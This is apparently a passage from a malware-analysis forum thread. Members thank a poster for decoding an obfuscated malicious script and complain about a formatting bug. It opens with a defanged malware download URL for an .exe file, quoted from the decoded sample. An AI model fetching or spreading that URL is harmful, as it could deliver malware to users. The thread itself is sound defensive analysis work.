=> "http ://dipudevaraj.com/deklar_11222016.exe"



This is amazing fun to decode! Thank you for another fun puzzle!

Each time you make an updated summary, I go back to the old one for reference and find new things I missed the first time reading it.
Thanks :)

Yes, it is better to look at the first post before:

=> Because in this last post, I didn't show again some parts already explained in detail in the first post.

But this way the last post seems a bit less complex to read.

DardiM
Formatting bug again, once posted => some random blank lines have disappeared.
I have just edited the post to add the lost blank lines ...
=> I hope I have not forgotten some parts.
(This bug is a big problem: each time I edit the post to correct it, hop, some blank lines disappear again ...)

Svoll
DardiM said:
Formatting bug again, once posted => some random blank lines have disappeared.
I have just edited the post to add the lost blank lines ...
=> I hope I have not forgotten some parts.
(This bug is a big problem: each time I edit the post to correct it, hop, some blank lines disappear again ...)

cough cough ScreenShot (comment on Notepad++ and SS) <-- also prevents copy + paste + infection

DardiM
Svoll said:
cough cough ScreenShot (comment on Notepad++ and SS) <-- also prevents copy + paste + infection
That is a good idea :)

The only problem is picture file length / size in comparison with formatted text :D

I am really exhausted from having to save / edit / save / edit, like a for (var i = 0 ; i < unknown value ; i++) {....}, and each time having to read the whole post line by line to find and correct all the deleted blank lines ... save ... and hop, other blank lines vanished...

Maybe a double loop ...

Imagine also when I try to correct the numerous English mistakes => hop, same bug, lol.